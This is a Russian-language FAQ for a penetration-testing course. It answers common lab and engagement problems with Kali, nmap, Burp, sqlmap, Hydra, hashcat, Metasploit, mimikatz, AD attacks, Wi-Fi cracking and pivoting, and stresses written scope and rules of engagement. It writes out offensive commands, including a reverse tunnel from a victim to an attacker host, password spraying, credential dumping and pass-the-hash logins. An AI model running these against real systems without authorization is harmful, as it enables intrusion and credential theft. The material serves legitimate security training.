Тестирование на проникновение — итоги
FAQ — Часто задаваемые вопросы
Типичные сбои в лаборатории и на engagement, плюс ответы на частые запросы в поиске ("Kali Linux установка", "nmap команды", "Burp Suite", "Hack The Box"). Краткий ответ здесь; разбор — в главах раздела. Заучивание — в чек-листе.
Вопрос. Kali в VirtualBox — нет сети, ping 8.8.8.8 не идёт.
Ответ. Проверьте режим адаптера (NAT vs Bridged), включён ли сетевой адаптер в настройках VM, systemctl status NetworkManager, DNS в /etc/resolv.conf. После смены режима — перезагрузка гостевой ОС. Подробнее здесь — Kali Linux — установка и настройка.
Вопрос. nmap показывает все порты filtered — на HTB "машина мертва".
Ответ. Убедитесь, что VPN HTB поднят, вы бьёте правильный IP лабы, а не свой шлюз. Попробуйте -Pn, проверьте firewall хоста и split-tunnel корпоративного VPN. Подробнее здесь — Сканирование, перехват и брутфорс.
Вопрос. Браузер ругается на сертификат Burp — сайты не открываются.
Ответ. Импортируйте CA Burp в доверенные корневые (Firefox — отдельное хранилище). Проверьте, что proxy слушает 127.0.0.1:8080 и intercept выключен для обычного серфинга. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. Hydra заблокировала учётки на лабе — "account locked".
Ответ. Снизьте потоки (-t 4), увеличьте задержку, используйте password spraying одним паролем на список логинов. На реальном engagement такое — инцидент; сверьтесь с ROE. Подробнее здесь — Сканирование, перехват и брутфорс.
Вопрос. Заказчик дал IP, а в SoW написаны домены — можно ли сканировать оба?
Ответ. Только то, что в письменном scope/ROE. IP без домена или наоборот — уточнение у PM, иначе риск вне scope. Подробнее здесь — Процессы пентестинга.
Вопрос. Сосед попросил "проверить Wi-Fi" — это легально для обучения?
Ответ. Чужая сеть без письменного разрешения владельца — та же правовая зона, что и атака на чужой сервер. Учитесь на своём роутере или изолированной lab-сети. Подробнее здесь — Тестирование беспроводных сетей.
Вопрос. Nessus/OpenVAS нашёл Critical — заказчик ждёт отчёт, а exploit не воспроизводится.
Ответ. Сканер даёт кандидатов: ручной PoC, версия ПО, false positive. В отчёт идёт подтверждённое; для остального — "не подтверждено" с рекомендацией. Подробнее здесь — Оценка уязвимостей и эксплуатация.
Вопрос. Metasploit module failed — "Exploit completed, but no session".
Ответ. Проверьте payload, LHOST/LPORT, firewall egress, архитектую (x86 vs x64), патч уязвимости. Ручной PoC из advisory часто надёжнее модуля "из коробки". Подробнее здесь — Оценка уязвимостей и эксплуатация.
Вопрос. BloodHound пустой — "No data returned from LDAP".
Ответ. Нужны валидные доменные креды, доступ к DC, правильный -d domain.local. Сначала foothold и сбор через ldapdomaindump / SharpHound. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. Kerberoasting дал хэши — hashcat не кряшит сутки.
Ответ. Уточните режим (-m 13100 для TGS), словарь, правила; слабые пароли сервисных учёток в lab часто в rockyou. На engagement — согласуйте время и нагрузку на GPU. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. Получил shell на Linux — через пять минут отвалился.
Ответ. Стабилизируйте TTY (python3 -c 'import pty...'), поднимите второй канал (cron, SSH key, reverse на другой порт). Firewall режет исходящие — try 443/53. Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. Нужен pivot в 10.10.20.0/24 — double pivot не пингуется.
Ответ. Цепочка: SSH -D / chisel / ligolo, proxychains с правильным proxychains.conf, маршруты на промежуточном хосте. Каждый hop — отдельный туннель и тест curl через прокси. Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. LinPEAS нашёл SUID — exploit из интернета убил VM.
Ответ. Сверьте ядро и дистрибутив, читайте исходник exploit, делайте snapshot до запуска. В отчёте — ручной путь privesc без "скачал и запустил неизвестное". Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. Заказчик просит "взломать AD за два дня" без creds — реально?
Ответ. Зафиксируйте black/grey box, наличие тестовой УЗ, окно. Без начальных creds и внешнего входа сроки часто нереалистичны — это вопрос к SoW, а не только к навыкам. Подробнее здесь — Процессы пентестинга.
Вопрос. Отчёт на 80 страниц скриншотов — заказчик не читает.
Ответ. Структура: Executive summary, attack narrative, findings с remediation, приложение с техдеталями. Один finding — impact, steps, evidence, fix, ссылка на CWE/CVSS. Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. SQLi в Burp есть, sqlmap — "not injectable".
Ответ. Ручная настройка: cookies, headers, tamper, level/risk, тип (time-based). Иногда WAF режет sqlmap, а ручной UNION работает. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. Gobuster находит только 404 — "на сайте нечего ломать".
Ответ. Смените wordlist, проверьте vhost fuzz (-H Host:), API из JS, параметры в Burp (param mining). Recon шире каталогов. Подробнее здесь — Инструменты Kali и сбор информации.
Вопрос. Responder / LLMNR poisoning в корпоративной сети заказчика — можно?
Ответ. Только если в ROE явно разрешён MitM и poisoning; иначе инцидент для Blue Team. Согласуйте окно и контакт SOC. Подробнее здесь — Сканирование, перехват и брутфорс.
Вопрос. WPA2 handshake не захватывается — deauth не помогает.
Ответ. Проверьте режим монитора, канал, драйвер адаптера, PMF (защита от deauth), попробуйте PMKID attack. Для Enterprise 802.1X — другой сценарий, не PSK. Подробнее здесь — Тестирование беспроводных сетей.
Вопрос. Snapshotted VM после rm -rf — как не потерять прогресс лабы?
Ответ. Snapshot до рискованных шагов, отдельная папка для loot/notes на хосте, не храните единственный proof только внутри гостя. Подробнее здесь — Kali Linux — установка и настройка.
Вопрос. Purple team: Blue заблокировал мой payload — это провал пентеста?
Ответ. Это измеримый результат: что детектировалось, что нет. Зафиксируйте в отчёте gap и рекомендации по правилам SIEM/EDR. Подробнее здесь — Процессы пентестинга.
Вопрос. Retest после патча — уязвимость "закрыта", но обход через другой параметр.
Ответ. Оформите как новый finding или reopen с regression; приложите старый и новый PoC. Заказчик должен видеть root cause fix, а не косметику WAF. Подробнее здесь — Оценка уязвимостей и эксплуатация.
Вопрос. SMB signing включён — relay "не работает", что дальше?
Ответ. Ищите хосты без signing, другие векторы (coerce, ADCS, Kerberos delegation). Relay — один путь в AD, а не единственный. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. Заказчик запретил эксплуатацию — только VA. Можно ли писать "RCE возможен"?
Ответ. Да, с пометкой "не эксплуатировалось по ROE" и ссылкой на advisory/CVE; риск описывается по потенциальному impact. Без PoC severity может быть ниже — честно укажите это. Подробнее здесь — Процессы пентестинга.
Вопрос. Docker на Kali — инструмент из GitHub "works on my machine" не запускается.
Ответ. Проверьте зависимости, версию Python/Go, права cap_net_raw для raw-сокетов. Для курса часто достаточно пакета из apt или готового Docker-образа SecLists/ProjectDiscovery. Подробнее здесь — Kali Linux — установка и настройка.
Вопрос. IDOR на API — в отчёте писать UUID жертвы целиком?
Ответ. Редактируйте PII: последние 4 символа, тестовые учётки. Impact опишите словами; полные дампы — только в зашифрованном приложении по согласованию. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. Смешал black-box внешний и white-box внутренний в одном PDF — заказчик в замешательстве.
Ответ. Разделите фазы и границы scope в оглавлении: внешний периметр, внутренняя сеть, AD. У каждой фазы — свои findings и timeline. Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. Kali Linux установка на VMware — какой образ скачать и какие настройки VM?
Ответ. Берите официальный ISO с kali.org, 64-bit, 4+ ГБ RAM, 40+ ГБ диск, включите VT-x/AMD-V на хосте. Guest additions упростят буфер обмена и сеть; snapshot до первого apt upgrade. Подробнее здесь — Kali Linux — установка и настройка.
Вопрос. nmap команды для начинающих — с чего начать сканирование хоста?
Ответ. Стартовый набор: nmap -sC -sV -oA scan target, при блокировке ping — -Pn, для всех портов — -p- с терпением. Сохраняйте вывод в файлы, не гоните дефолтный aggressive scan на прод без ROE. Подробнее здесь — Инструменты Kali и сбор информации.
Вопрос. Burp Suite Community Edition — как включить прокси и перехват HTTPS?
Ответ. Proxy listener на 127.0.0.1:8080, в браузере тот же адрес, CA Burp в доверенные корневые. Scope ограничивает шум; Repeater и Intruder — после ручного PoC. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. Hack The Box VPN — ovpn скачал, но машины не пингуются.
Ответ. Поднимите туннель sudo openvpn lab.ovpn, проверьте маршрут HTB-сети, отключите split-tunnel корпоративного VPN. IP таргета берите из лабы, не из своей LAN. Подробнее здесь — Kali Linux — установка и настройка.
Вопрос. dirsearch и ffuf — какую wordlist взять для веб-разведки?
Ответ. Старт с SecLists Discovery/Web-Content, для API — raft-large-words, для vhost — -H Host: и отдельный список. Следите за rate limit и кодами 403 vs 404. Подробнее здесь — Инструменты Kali и сбор информации.
Вопрос. nikto scan веб-сервера — что означают находки в отчёте?
Ответ. Nikto даёт шумные сигналы: устаревшие заголовки, типовые пути, версии. Каждый пункт сверяйте вручную; в отчёт идёт подтверждённая уязвимость с PoC. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. sqlmap команды — как проверить GET-параметр на SQL injection?
Ответ. Базовый прогон: sqlmap -u "URL?id=1" --batch --risk=2 --level=3, с cookie из Burp — --cookie=, при WAF — tamper-скрипты. Сначала ручной UNION/time-based в Repeater. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. PortSwigger Web Security Academy — как связать с Burp в лабах?
Ответ. Встроенный браузер Burp или локальный прокси 127.0.0.1:8080 на lab.portswigger.net. Решайте room по OWASP-классам, фиксируйте payload в заметках для отчёта. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. passive OSINT recon — что собирать до первого пакета на цель?
Ответ. WHOIS, DNS история, crt.sh, subfinder, theHarvester, публичные репозитории и paste. Пассивный recon реже попадает под IDS, но всё равно сверяйте с scope. Подробнее здесь — Инструменты Kali и сбор информации.
Вопрос. hashcat wordlist и rules — как ускорить перебор NTLM?
Ответ. Режим -m 1000 для NTLM, rockyou + правила best64/rule_d3ad0ne, --show для уже взломанных. На engagement согласуйте нагрузку GPU и время окна. Подробнее здесь — Сканирование, перехват и брутфорс.
Вопрос. PTES этапы penetration testing — в каком порядке идти на engagement?
Ответ. Pre-engagement → intel gathering → threat modeling → vulnerability analysis → exploitation → post-exploitation → reporting. Каждый этас фиксируйте в timeline отчёта. Подробнее здесь — Процессы пентестинга.
Вопрос. OWASP Top 10 в пентесте — что проверять в первую очередь на вебе?
Ответ. Приоритет: broken access control, injection, SSRF, misconfiguration. Чек-лист WSTG шире Top 10 — используйте оба. Каждый finding — steps to reproduce. Подробнее здесь — Уязвимости веб-приложений и серверов.
Вопрос. Metasploit search exploit — module нашёлся, но target не vulnerable.
Ответ. Сверьте версию ПО, патч, архитектуру и платформу в info, check где есть. Ручной PoC из CVE часто точнее generic module. Подробнее здесь — Оценка уязвимостей и эксплуатация.
Вопрос. meterpreter команды — что сделать сразу после session?
Ответ. sysinfo, getuid, hashdump или load kiwi, стабильный канал, migrate в процесс с нужными правами. Loot и скриншоты — в зашифрованное хранилище по ROE. Подробнее здесь — Оценка уязвимостей и эксплуатация.
Вопрос. crackmapexec smb — как перечислить шары и проверить пароли?
Ответ. crackmapexec smb 10.0.0.0/24 -u user -p pass --shares, для spraying — один пароль на список. Логируйте успехи; relay возможен только при условиях из ROE. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. pass the hash NTLM — когда работает без пароля в открытом виде?
Ответ. Нужен валидный NTLM-хэш и протокол без channel binding (часто SMB/WMI). PtH — lateral movement, не magic; ищите local admin reuse и отключённый AV по политике lab. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. mimikatz sekurlsa logonpasswords — почему ACCESS DENIED?
Ответ. Нужны SeDebugPrivilege и права администратора, защита LSASS (PPL, Credential Guard) блокирует дамп. На engagement только в scope; в lab — Win10 без hardening. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. evil-winrm вход по WinRM — что проверить до подключения?
Ответ. Порт 5985/5986, учётка с правом Remote Management, firewall и HTTPS-сертификат. -i IP -u user -p pass или -H NTLMhash. Подробнее здесь — Active Directory и типовые сервисы.
Вопрос. chisel reverse tunnel — как пробросить порт через compromised Linux?
Ответ. На атакующей: chisel server -p 8000 --reverse, на жертве: chisel client ATTACKER:8000 R:1080:socks. Дальше proxychains или локальный SOCKS в инструментах. Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. proxychains nmap через SOCKS — почему scan "молчит"?
Ответ. В proxychains.conf — socks5 127.0.0.1 1080, strict_chain. SYN-scan через SOCKS часто не работает — используйте -sT, медленнее, но через туннель. Подробнее здесь — Pivoting, post-exploitation и отчёты.
Вопрос. aircrack-ng WPA2 handshake — какой формат cap и wordlist?
Ответ. Захват .cap/.pcapng с EAPOL, атака aircrack-ng -w rockyou.txt capture.cap. Без handshake пробуйте PMKID (hcxdumptool + hashcat -m 22000). Подробнее здесь — Тестирование беспроводных сетей.
Вопрос. wireshark фильтр HTTP и follow TCP stream — зачем в пентесте?
Ответ. В MitM и Wi-Fi lab видны cookie, Basic Auth, незашифрованный трафик. Фильтры http, tls.handshake.type == 1; для HTTPS без ключей — только метаданные. Подробнее здесь — Сканирование, перехват и брутфорс.
Резюме раздела
Процесс — PTES от SoW/ROE до retest; black/grey/white box; purple team как совместная работа Red и Blue.
Kali — lab-среда; VM + snapshot; apt и metapackages.
Recon — passive OSINT, DNS/AXFR, сетевое перечисление, fingerprinting, веб-разведка (crawl, vhost, API из JS).
Скан и пароли — nmap layers, MitM, hashcat/Hydra, spraying vs brute.
Wi-Fi — 802.11, WPA2 handshake, PMKID, Enterprise 802.1X.
Веб — OWASP WSTG, Burp, injection/IDOR/SSRF, business logic.
VA и exploitation — triage scanner output, manual PoC, Metasploit modules, exploit chaining.
AD и сервисы — Kerberos, NTLM relay, BloodHound, SMB/RDP/SSH/DB defaults.
Post-exploitation — pivot (SSH SOCKS, proxychains), privesc Windows/Linux, attack narrative, executive + technical report, remediation SLA.
Ключевые термины
| Термин | Определение |
|---|---|
| SoW / ROE | Scope и правила engagement |
| VA | Vulnerability assessment без обязательного exploit |
| Foothold | Первый доступ на хост |
| Pivot | Мост в недоступную сеть |
| Lateral movement | Переход между хостами |
| Privesc | Повышение привилегий до admin/SYSTEM |
| BloodHound | Граф путей в AD |
| Attack narrative | История цепочки компромисса в отчёте |
Маршрут по статьям
- Kali — установка
- Процессы пентестинга
- Recon
- Скан и брутфорс
- Wi-Fi
- Веб и серверы
- VA и эксплуатация
- AD и сервисы
- Pivot, post-exploit, отчёты
- Чек-лист
Следующие шаги
- Lab — Hack The Box, PortSwigger, GOAD (AD).
- Отчёты — 8.09/2.
- Теория — 8.07/1131.
См. также
Другие статьи этого же раздела в боковом меню (как на странице "О разделе"). Установка Kali Linux в VM, dual boot и WSL, первый вход, репозитории apt, обновление системы и подготовка рабочей среды для пентеста. Категории утилит Kali Linux, passive и active recon, OSINT, DNS и поддомены, nmap и httpx — методы легальной разведки перед пентестом. Аудит Wi-Fi в Kali Linux — режим monitor, aircrack-ng, захват handshake, WPA/WPA2, WPS, Evil Twin и меры защиты беспроводной сети. Пентест веб-приложений и серверов в Kali — Burp Suite, OWASP ZAP, Nikto, SQLi, XSS, SSRF, misconfiguration и hardening. Сетевое сканирование nmap, перехват трафика Wireshark и MitM, атаки на пароли — Hashcat, John the Ripper, Hydra — в рамках легального пентеста. Тестирование на проникновение как процесс — PTES, OSSTMM, типы аудита, pre-engagement, scope, правила взаимодействия с заказчиком и жизненный цикл engagement. Vulnerability assessment и exploitation — автоматизированное и ручное тестирование, верификация findings, Metasploit, exploit lifecycle и безопасная эксплуатация в scope. Пентест Windows-домена и типовых сетевых сервисов — LDAP, Kerberos, SMB, RDP, SSH, FTP, атаки на пароли, BloodHound, Impacket и Hydra в lab. Lateral movement и pivoting, повышение привилегий Windows и Linux, post-exploitation, сбор доказательств и составление отчёта пентеста коммерческого уровня. Вопросы для закрепления раздела 8.10 — Kali Linux, recon, Wi-Fi, веб-пентест, сканирование и атаки на пароли.Kali Linux — установка и настройка
Инструменты Kali и сбор информации
Тестирование беспроводных сетей
Уязвимости веб-приложений и серверов
Сканирование, перехват и брутфорс
Процессы пентестинга
Оценка уязвимостей и эксплуатация
Active Directory и типовые сервисы
Pivoting, post-exploitation и отчёты
Тестирование на проникновение — чек-лист самопроверки